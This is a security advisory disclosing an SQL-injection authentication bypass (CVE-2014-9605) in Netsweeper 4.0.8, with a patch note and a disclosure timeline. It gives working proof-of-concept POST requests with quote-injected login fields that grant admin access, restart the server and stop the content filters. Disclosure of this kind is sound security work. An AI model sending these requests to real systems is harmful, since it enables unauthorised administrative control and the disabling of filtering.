+----------------------------------------------------------------++ Netsweeper 4.0.8- SQL Injection Authentication Bypass (Admin)++----------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com/
Version :4.0.8(and probably other versions)
Discovered by : Anastasios Monachos (secuid0)-[anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9605+---------------------++ Product Description ++---------------------+
Netsweeper is a software solution specialized in content filtering.+----------------------++ Exploitation Details ++----------------------+
By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8(and probably other versions) to authenticate us as admin. The access gives us the ability to:
i)"Back Up the System" which creates a downloadable system backup tarball file(containing the whole /etc /usr and/var folders)
ii)"Restart" the server
iii)"Stop the filters on the server"
Vulnerability Type: Authentication Bypass (using two single-quotes)
p0c: http://netsweeper/webupgrade/webupgrade.php
POST: step=&login='&password='&show_advanced_output=
p0c restart the server:
http://netsweeper/webupgrade/webupgrade.php
POST: step=12&login='&password='&show_advanced_output=
followed by
http://netsweeper/webupgrade/webupgrade.php HTTP/1.1
POST: step=12&restart=yes&show_advanced_output=false
p0c stop the filters on the server:
http://netsweeper/webupgrade/webupgrade.php
POST: step=9&stopservices=yes&show_advanced_output=+----------++ Solution ++----------+
Upgrade to latest version.+---------------------++ Disclosure Timeline ++---------------------+24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10,4.0.9,4.1.217-Dec-2014: New releases 3.1.10,4.0.9,4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-960511-Aug-2015: Public disclosure
